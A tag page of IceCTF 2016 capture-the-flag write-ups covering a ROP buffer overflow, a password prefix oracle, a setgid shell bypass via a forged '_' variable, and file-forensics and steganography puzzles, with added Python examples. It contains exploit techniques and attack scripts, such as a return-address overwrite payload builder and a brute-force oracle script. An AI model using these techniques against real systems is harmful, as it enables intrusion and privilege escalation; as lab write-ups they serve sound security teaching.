Articles tagged icectf2016

  1. IceCTF 2016 - ROPi


    Challenge description:

    Return oriented programming (the original is Italian: "Ritorno orientata programmazione") nc ropi.vuln.icec.tf 6500

    The binary provided with the challenge was an x86 ELF. I started by reversing it with radare2:

    [video: radare2 session, pause it to look at the functions]

    The main function just calls ezy, which reads 0x40 bytes into a buffer that is only 0x28 bytes in size. That means 0x18 bytes run past the end of the buffer. The first 4 of those overwrite the saved EBP and the next 4 overwrite the saved return address, which is what gets loaded into EIP when ezy returns. To test this theory we load the binary in gdb and send 0x28 bytes of padding, then BBBB to land in the saved EBP, then iiii to land in EIP:

    ...


    Check out the full post for more details!
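
    The offset hunt described above, as an added example that is not taken from the post: a pure-Python cyclic pattern (the idea behind pwntools' cyclic/cyclic_find) that reads the saved-EBP and return-address offsets straight out of a crash, a model of ezy's frame built from the two sizes the post gives (0x28-byte buffer, 0x40-byte read), and a payload builder that refuses to exceed the 0x40 bytes actually read. The frame model and the number of spare dwords left for a chain are derived from those two numbers, not from the binary itself.

```python
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...). Every 4-byte window is unique
    within the first 20280 bytes, so 4 bytes seen in a crashed register map to one offset."""
    groups = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups.append(upper + lower + digit)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length].encode()
    return "".join(groups)[:length].encode()


def pattern_offset(pattern, value):
    """Offset of a register value inside `pattern`. `value` is either the raw 4 bytes or
    the integer gdb shows; x86 is little-endian, so the integer is packed with '<I' first."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    idx = pattern.find(value)
    if idx < 0 or pattern.find(value, idx + 1) >= 0:
        raise ValueError("value not in pattern, or not unique")
    return idx


def simulate_ezy(payload, buf_size=0x28, read_len=0x40):
    """Model of ezy's frame (assumed from the post): buf_size bytes of buffer, then the saved
    EBP, then the return address. Only read_len bytes are consumed. Returns (ebp, eip)."""
    data = payload[:read_len].ljust(read_len, b"\x00")
    ebp = struct.unpack("<I", data[buf_size:buf_size + 4])[0]
    eip = struct.unpack("<I", data[buf_size + 4:buf_size + 8])[0]
    return ebp, eip


def build_payload(ret_addr, chain=(), buf_size=0x28, read_len=0x40):
    """Padding, a fake saved EBP, the return address, then the remaining dwords for a ROP
    chain. Refuses to build anything longer than the read, since those bytes never arrive."""
    payload = b"A" * buf_size + b"BBBB" + struct.pack("<I", ret_addr)
    payload += b"".join(struct.pack("<I", gadget) for gadget in chain)
    if len(payload) > read_len:
        raise ValueError(f"payload is {len(payload)} bytes but only {read_len} are read")
    return payload


if __name__ == "__main__":
    pat = pattern_create(0x40)
    ebp, eip = simulate_ezy(pat)
    print("saved EBP at offset", hex(pattern_offset(pat, ebp)))        # 0x28
    print("return address at offset", hex(pattern_offset(pat, eip)))   # 0x2c
    # The post's manual test: 0x28 bytes of padding, then BBBB, then iiii
    print([hex(v) for v in simulate_ezy(b"A" * 0x28 + b"BBBB" + b"iiii")])
```

    With a 0x40-byte read and a 0x28-byte buffer, the return address sits at offset 0x2c and exactly four more dwords fit after it, which is the budget any ROP chain for this binary has to live in.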

  2. IceCTF 2016 - A Strong Feeling


    Challenge description:

    Do you think you could defeat this password checker for us? It's making me real pissed off! /home/a_strong_feeling/ on the shell or download it here

    I started by loading the bin into radare2, and once I realized how big the main function was I just tried running it with some input.

    It looks like the sentence returned changes each time we get one more character right, and is the same for any guesses that get the same number of characters right: the checker is leaking how long our correct prefix is. I had the idea to write a python script with pwntools that runs the binary over and over, appending one character at a time, until a different sentence is produced:

    from pwn import *
    import string

    charset = string.ascii_letters + string.digits + "{}_#"
    context.log_level = 'error'

    b = ELF("./strong_feeling")

    def check(guess):
        """Run the binary once with `guess` on stdin and return everything it prints."""
        p = process(b.path)
        p.sendline(guess)
        out = p.recvall()
        p.close()   # don't leak a process per attempt
        return out

    flag = "I"
    out = check(flag)

    # The sentence only changes when one more leading character is right, so keep
    # extending the prefix by whichever single character changes the output.
    while flag[-1] != '}':
        for c in charset:
            newout = check(flag + c)
            if newout != out:
                out = newout
                flag += c
                print(flag)
                break
    

    The results were quite satisfying:

    Flag acquired

    IceCTF{pip_install_angr}

    And yes I realize now that this could have just been solved with angr, but this was a cool way to do it too!
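
    The prefix oracle the script above relies on, as an added example that is not part of the original post: a checker modelled on the challenge's observable behaviour (constructed, with a made-up secret and made-up sentences), the same one-character-at-a-time recovery run offline against it, and a constant-time variant that answers identically for every wrong guess, so the same loop gets nowhere against it.

```python
import hmac
import string

CHARSET = string.ascii_letters + string.digits + "{}_#"
SECRET = "IceCTF{constructed_secret}"   # constructed stand-in for the binary's real flag


def leaky_check(guess, secret=SECRET):
    """Models the challenge binary: compares character by character, stops at the first
    mismatch, and the sentence it prints depends on how far it got. That is the leak."""
    matched = 0
    for g, s in zip(guess, secret):
        if g != s:
            break
        matched += 1
    return f"I have a strong feeling about this... level {matched}"


def constant_time_check(guess, secret=SECRET):
    """Hardened version: one fixed answer for every wrong guess, compared with
    hmac.compare_digest so the result never depends on where the first mismatch is."""
    ok = hmac.compare_digest(guess.encode(), secret.encode())
    return "Correct!" if ok else "Wrong."


def recover(oracle, start="I", charset=CHARSET, max_len=64):
    """The post's strategy, offline: extend the known prefix by the one character whose
    response differs from the current one. Returns None when no character changes the
    answer, which is exactly what happens against the constant-time checker."""
    flag = start
    out = oracle(flag)
    while not flag.endswith("}") and len(flag) < max_len:
        for c in charset:
            new = oracle(flag + c)
            if new != out:
                out, flag = new, flag + c
                break
        else:
            return None
    return flag if flag.endswith("}") else None


if __name__ == "__main__":
    print("leaky checker   :", recover(leaky_check))
    print("constant-time   :", recover(constant_time_check))
```

    The fix is not the comparison function alone: the output has to be identical for every wrong answer as well, otherwise the per-prefix message reintroduces the oracle that the script exploits.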

  3. IceCTF 2016 - Blue Monday


    Challenge Description:

    Those who came before me lived through their vocations From the past until completion, they'll turn away no more And still I find it so hard to say what I need to say But I'm quite sure that you'll tell me just how I should feel today.

    A file download was given for this challenge. Running file yielded the following result:

    → file blue_monday.mid
    blue_monday.mid: Standard MIDI data (format 1) using 1 track at 1/220
    

    Assuming it actually was MIDI, I opened it up in Audacity with no luck; it was just a bunch of constant tones. This was at about 2:30AM, so as a last effort before bed I just catted the file:

    → cat blue_monday.mid
    MThdTrkId\Icd\ced\eCd\CTd\TFd\F{d\{Hd\HAd\Acd\ckd\k1d\1nd\n9d\9_d\_md\mUd\U5d\5Id\Icd\c_d\_Wd\W1d\17d\7hd\h_d\_md\mId\IDd\D1d\15d\5_d\_Ld\L3d\3td\t5d\5_d\_Hd\H4d\4vd\vEd\E_d\_ad\a_d\_rd\r4d\4vd\v3d\3}d\}h/
    

    The point of interest here for me was that it looked like the beginning was spelling IceCTF{ but with extra characters in between. I loaded it up into ipython and ended up with this snippet to solve it:

    with open("blue_monday.mid", "rb") as f:
        data = f.read()

    # Keep only bytes in the visible ASCII range that are not '\' or 'd' (the bytes that
    # sit between the flag characters), drop the 7 leftover header characters and the
    # trailing 2, then take every other character because each note appears twice.
    kept = [chr(b) for b in data if 0x10 < b < 127 and chr(b) not in '\\d']
    print(''.join(kept)[7:][:-2][::2])
    

    Basically this keeps only bytes in the visible ASCII range (between 0x10 and 0x7f) that are not a backslash or a d, cuts off the first 7 characters (what is left of the MThd and MTrk chunk headers) and the last 2, and then takes every other character. The flag had simply been embedded in a working MIDI file: each flag character is used as a note number, every note appears twice because it is switched on and then off, and the d and backslash between them are most likely the velocity (0x64) and delta-time (0x5c) bytes of those events. Anyway, when you run this it prints the flag: IceCTF{HAck1n9_mU5Ic_W17h_mID15_L3t5_H4vE_a_r4v3}
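
    A structural reading of the file instead of a byte filter, as an added example that is not from the post: a small Standard MIDI parser that walks the MThd/MTrk chunks, decodes variable-length delta times, honours running status, skips meta and sysex events, and collects the note numbers of note-on events before decoding them as ASCII. build_midi constructs a sample file with the same event layout as the challenge's; the velocity 0x64 and the 0x5c-tick gap are assumptions drawn from the d and backslash in the cat output, and the file it builds is not blue_monday.mid.

```python
import struct


def read_varlen(data, pos):
    """Decode a MIDI variable-length quantity starting at pos; returns (value, next_pos)."""
    value = 0
    while True:
        b = data[pos]
        pos += 1
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            return value, pos


def track_note_ons(body):
    """Note numbers of every note-on (velocity > 0) in one MTrk body, honouring running status."""
    notes, pos, status = [], 0, None
    while pos < len(body):
        _delta, pos = read_varlen(body, pos)
        b = body[pos]
        if b == 0xFF:                                   # meta event: FF type len data
            length, pos = read_varlen(body, pos + 2)
            pos += length
            status = None                               # meta and sysex cancel running status
            continue
        if b in (0xF0, 0xF7):                           # sysex: F0/F7 len data
            length, pos = read_varlen(body, pos + 1)
            pos += length
            status = None
            continue
        if b & 0x80:                                    # a new status byte
            status = b
            pos += 1
        elif status is None:
            raise ValueError("data byte with no running status")
        kind = status & 0xF0
        ndata = 1 if kind in (0xC0, 0xD0) else 2        # program change / channel pressure: one byte
        params = body[pos:pos + ndata]
        pos += ndata
        if kind == 0x90 and params[1] > 0:
            notes.append(params[0])
    return notes


def midi_notes(data):
    """Walk the chunks of a Standard MIDI file and collect note-on numbers from every track."""
    if data[:4] != b"MThd":
        raise ValueError("not a Standard MIDI file")
    pos = 8 + struct.unpack(">I", data[4:8])[0]
    notes = []
    while pos + 8 <= len(data):
        ctype = data[pos:pos + 4]
        clen = struct.unpack(">I", data[pos + 4:pos + 8])[0]
        if ctype == b"MTrk":
            notes.extend(track_note_ons(data[pos + 8:pos + 8 + clen]))
        pos += 8 + clen                                 # unknown chunk types are skipped by length
    return notes


def decode_flag(data):
    """Read the note numbers as ASCII, which is how the challenge file carried its text."""
    return bytes(midi_notes(data)).decode("ascii")


def build_midi(text, velocity=0x64, gap=0x5C, division=220):
    """Construct a format-1, single-track file whose note numbers are the bytes of `text`
    (sample data for this example). Each character is switched on at delta 0 with velocity
    0x64 ('d') and off after 0x5C ('\\') ticks, reproducing the Id\\Icd\\c pattern cat showed."""
    track = b""
    for ch in text.encode("ascii"):                     # note numbers must be 7-bit, ASCII is
        track += b"\x00" + bytes([0x90, ch, velocity])  # note on
        track += bytes([gap, 0x90, ch, 0x00])           # note off (note on with velocity 0)
    track += b"\x00\xFF\x2F\x00"                        # end-of-track meta event
    header = b"MThd" + struct.pack(">IHHH", 6, 1, 1, division)
    return header + b"MTrk" + struct.pack(">I", len(track)) + track


if __name__ == "__main__":
    sample = build_midi("IceCTF{constructed}")
    print(decode_flag(sample))
```

    Because the parser only looks at note-on events, it does not care how many header bytes happen to be printable or which delta-time values the author chose, which is where the byte-filter one-liner would break on a differently built file.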

  4. IceCTF 2016 - Corrupt Transmission


    Challenge description:

    We intercepted this image, but it must have gotten corrupted during the transmission. Can you try and fix it?

    For this challenge a file with the extension .png was provided. A common CTF trick is to corrupt part of an image file and ask you to repair it, so I started with the header. According to Wikipedia a PNG file is supposed to start with the signature 89 50 4E 47 0D 0A 1A 0A. Looking at the file using xxd we can see that this png does not start with those bytes:

    → xxd corrupt_orig.png | head -1
    00000000: 9050 4e47 0e1a 0a1b 0000 000d 4948 4452  .PNG........IHDR
    

    The first byte and bytes 5 through 8 (counting from 1) are wrong; the IHDR chunk length and type that follow are exactly what a PNG should have, so only the signature needed attention. To fix it, I opened the image up in hexedit and changed those five bytes to their correct values. Opening the file then showed a valid image:

    flag

    And of course, the flag: IceCTF{t1s_but_4_5cr4tch}
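
    The same repair plus the check that tells you whether the signature was the only damage, as an added example not from the post: repair_signature restores the 8-byte PNG signature and reports which offsets changed, check_chunks walks the chunk list and verifies every CRC (computed over type and data, as the PNG spec requires), and make_png constructs a minimal valid PNG to test against. The corrupted signature bytes are the ones from the xxd line above; the image itself is constructed and is not the challenge file.

```python
import struct
import zlib

PNG_SIGNATURE = bytes.fromhex("89504e470d0a1a0a")
# The damage seen in the post: 90 50 4e 47 0e 1a 0a 1b where 89 50 4e 47 0d 0a 1a 0a belongs
CORRUPT_SIGNATURE = bytes.fromhex("90504e470e1a0a1b")


def repair_signature(data):
    """Return (fixed_bytes, changed_offsets): the first 8 bytes replaced by the PNG signature."""
    changed = [i for i in range(8) if data[i] != PNG_SIGNATURE[i]]
    return PNG_SIGNATURE + data[8:], changed


def check_chunks(data):
    """Walk the chunks after the signature and verify each CRC.
    Returns [(chunk_type, length, crc_ok), ...]; a bad CRC means corruption beyond the header."""
    results, pos = [], 8
    while pos + 12 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        results.append((ctype.decode("latin-1"), length, zlib.crc32(ctype + body) == crc))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return results


def ihdr(data):
    """Decode the IHDR fields, which sit right after the signature in a well-formed file."""
    w, h, depth, ctype, _comp, _filt, interlace = struct.unpack(">IIBBBBB", data[16:29])
    return {"width": w, "height": h, "bit_depth": depth, "color_type": ctype, "interlace": interlace}


def _chunk(ctype, body):
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def make_png(width=1, height=1):
    """Construct a minimal valid 8-bit grayscale PNG (sample data, not corrupt_orig.png)."""
    ihdr_body = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + bytes(width) for _ in range(height))   # filter byte 0 + black row
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr_body) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


if __name__ == "__main__":
    damaged = CORRUPT_SIGNATURE + make_png(4, 2)[8:]
    fixed, changed = repair_signature(damaged)
    print("changed offsets:", changed)          # [0, 4, 5, 6, 7]
    print("chunks:", check_chunks(fixed))       # every CRC should be ok
    print("ihdr:", ihdr(fixed))
```

    If any CRC in check_chunks comes back false after the signature repair, the corruption reaches into the chunk data and a hex editor pass on the first eight bytes will not be enough.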

  5. IceCTF 2016 - Demo


    Challenge description:

    I found this awesome premium shell, but my demo version just ran out... can you help me crack it? /home/demo/ on the shell.

    The source for this challenge was provided:

    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <libgen.h>
    #include <string.h>
    
    void give_shell() {
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
        system("/bin/sh");
    }
    
    int main(int argc, char *argv[]) {
        if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
            give_shell();
        }
        else {
            printf("I'm sorry, your free trial has ended.\n");
        }
        return 0;
    }
    

    So to get the flag we need the basename of the _ variable to equal icesh. The _ variable is set by the shell, not by the program: bash keeps it as the last argument of the previous command, and when it runs a command it exports _ into that command's environment as the command's full pathname. In other words the program is trusting an ordinary environment variable that whoever launches it controls (and since strncmp compares six bytes here, including the terminator, the basename has to be exactly icesh; if _ is not set at all, getenv returns NULL and basename will crash on it). So I decided to use a different shell to see what would happen.

    sh
    ls icesh; /home/demo/demo
    cat flag.txt
    IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}
    

    And there we have our flag: IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}
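
    Why the check is worthless, shown end to end as an added example that is not from the post: demo_check is a Python rendering of the C comparison, and child_sees starts a child process with an _ of our choosing and reports the basename that child observes. The child is a Python one-liner standing in for /home/demo/demo (a constructed example); nothing here touches the real binary.

```python
import os
import subprocess
import sys


def demo_check(underscore):
    """Python rendering of strncmp(basename(getenv("_")), "icesh", 6) == 0.
    Six bytes covers the terminating NUL too, so only a basename of exactly "icesh" passes."""
    return os.path.basename(underscore) == "icesh"


def child_sees(value):
    """Start a child with the _ variable set to `value` and return the basename it observes.
    The child is a Python one-liner standing in for the challenge binary."""
    env = dict(os.environ, _=value)                      # the caller decides what _ contains
    code = "import os; print(os.path.basename(os.environ.get('_', '')))"
    result = subprocess.run([sys.executable, "-c", code], env=env, capture_output=True, text=True)
    return result.stdout.strip()


if __name__ == "__main__":
    for forged in ("/home/demo/demo", "/tmp/icesh", "/usr/bin/iceshell"):
        seen = child_sees(forged)
        print(f"_={forged!r:22} child sees {seen!r:12} -> shell: {demo_check(seen)}")
```

    The child has no way to tell an _ that bash set from one the caller exported by hand, which is the whole point of the flag's "who would ever trust argv".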

  6. IceCTF 2016 - Thor is a hacker now


    Challenge description:

    Thor has been staring at this for hours and he can't make any sense out of it, can you help him figure out what it is?

    The text file provided is just a hexdump produced with xxd. xxd has a -r option that reverses a hexdump back into the original bytes; from there I identified the resulting file's format with the file command. It was lzip-compressed data. Extracting it produced the following image:

    thor

    Flag:

    IceCTF{h3XduMp1N9_l1K3_A_r341_B14Ckh47}

    Commands that were run in order:

    → xxd -r thor.txt > thor.bin
    → file thor.bin
    thor.bin: lzip compressed data, version: 1
    → lzip -d thor.bin
    → file thor.bin.out
    thor.bin.out: JPEG image data, JFIF standard 1.01
    → mv thor.bin.out thor.jpg
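
    What xxd -r and file do in the steps above, as an added example that is not from the post: a reverse-hexdump parser that trusts only the offset and hex columns (the ASCII column is lossy, every non-printable byte is shown as a dot) and a signature check for the formats that turn up in these writeups. The dumps it runs on are constructed samples, not thor.txt.

```python
import re


def xxd_reverse(dump):
    """Pure-Python `xxd -r` for xxd's default layout: '<offset>: <hex groups>  <ascii>'.
    Offsets are honoured (gaps are zero-filled) and the ASCII column is ignored."""
    out = bytearray()
    for line in dump.splitlines():
        if not line.strip():
            continue
        offset_text, _, rest = line.partition(":")
        offset = int(offset_text.strip(), 16)
        hex_part = re.split(r"\s{2,}", rest.strip(), maxsplit=1)[0]   # hex groups use single spaces
        chunk = bytes.fromhex(hex_part.replace(" ", ""))
        if offset > len(out):
            out.extend(bytes(offset - len(out)))
        out[offset:offset + len(chunk)] = chunk
    return bytes(out)


MAGICS = [
    (b"LZIP", "lzip compressed data"),
    (b"\xff\xd8\xff", "JPEG image data"),
    (b"\x89PNG\r\n\x1a\n", "PNG image data"),
    (b"MThd", "Standard MIDI data"),
]


def identify(data):
    """Minimal stand-in for `file`: match the leading bytes against a few known signatures."""
    for magic, name in MAGICS:
        if data.startswith(magic):
            return name
    return "data"


# Constructed sample dumps (not thor.txt). The first starts like an lzip member: magic "LZIP",
# version 1, a dictionary-size byte, then bytes standing in for the compressed stream.
LZIP_DUMP = """\
00000000: 4c5a 4950 0117 005d 0000 8000 1234 5678  LZIP...].....4Vx
00000010: 9abc def0                                ....
"""
# The second is the start of a JFIF JPEG: SOI marker ff d8, then the APP0 segment carrying "JFIF".
JPEG_DUMP = """\
00000000: ffd8 ffe0 0010 4a46 4946 0001 0101 0048  ......JFIF.....H
"""

if __name__ == "__main__":
    for name, dump in (("lzip sample", LZIP_DUMP), ("jpeg sample", JPEG_DUMP)):
        data = xxd_reverse(dump)
        print(f"{name}: {len(data)} bytes, {identify(data)}")
```

    Rebuilding from the hex column rather than the ASCII column matters because xxd's right-hand side replaces every byte outside 0x20 to 0x7e with a dot; a decoder that read it would turn the lzip and JPEG headers into garbage.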
    
  7. IceCTF 2016 - Vape Nation


    Challenge description:

    Go Green!

    They provide a png called vape_nation.png:

    vape nation

    With the hint I figured it must be something hidden in the green channel, so I loaded the image in Stegsolve and stepped through the green bit-plane filters. Green plane 0, the least significant bit of every pixel's green value, resulted in the following:

    solved nation

    Looks like a flag :)

    IceCTF{420_CuR35_c4NCEr}
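
    What Stegsolve's "Green plane 0" view computes, as an added example that is not part of the post and does not use vape_nation.png: a bit-plane extractor over rows of (r, g, b) tuples, plus an embedder that hides a small mask in the green LSB of a constructed cover image so the extraction can be checked. The tell in a real image is that the LSB plane of a photograph looks like noise; a plane that shows shapes or text was written there deliberately.

```python
import random


def bit_plane(pixels, channel=1, bit=0):
    """One bit of one channel for every pixel, as rows of 0/1. channel 1 is green and bit 0
    the least significant bit, which is what Stegsolve labels 'Green plane 0'."""
    return [[(px[channel] >> bit) & 1 for px in row] for row in pixels]


def embed_green_lsb(pixels, mask):
    """Overwrite the green LSB of every pixel with a 0/1 mask. The green value moves by at most
    1, invisible to the eye but plain in a bit-plane view."""
    return [[(r, (g & ~1) | m, b) for (r, g, b), m in zip(row, mrow)]
            for row, mrow in zip(pixels, mask)]


def render(plane, on="#", off="."):
    """ASCII rendering of a bit plane, the way a viewer shows white and black."""
    return "\n".join("".join(on if v else off for v in row) for row in plane)


def constructed_cover(width, height, seed=1):
    """Pseudo-random RGB 'photo' to hide in (constructed sample, not vape_nation.png)."""
    rng = random.Random(seed)
    return [[(rng.randrange(256), rng.randrange(256), rng.randrange(256)) for _ in range(width)]
            for _ in range(height)]


# Constructed 5x14 mask to hide: a small 'X' and 'F' shape.
MESSAGE = [[1 if c == "#" else 0 for c in line] for line in [
    "#...#.###.....",
    ".#.#..#.......",
    "..#...###.....",
    ".#.#..#.......",
    "#...#.#.......",
]]

if __name__ == "__main__":
    cover = constructed_cover(14, 5)
    stego = embed_green_lsb(cover, MESSAGE)
    print("green plane 0 of the cover (noise):")
    print(render(bit_plane(cover)))
    print("green plane 0 after embedding:")
    print(render(bit_plane(stego)))
```

    Checking the other planes of the same channel (bit 1 and up) and the other channels after embedding shows them untouched, which is why a single-plane view is the right tool: the payload lives in one bit of one channel and nowhere else.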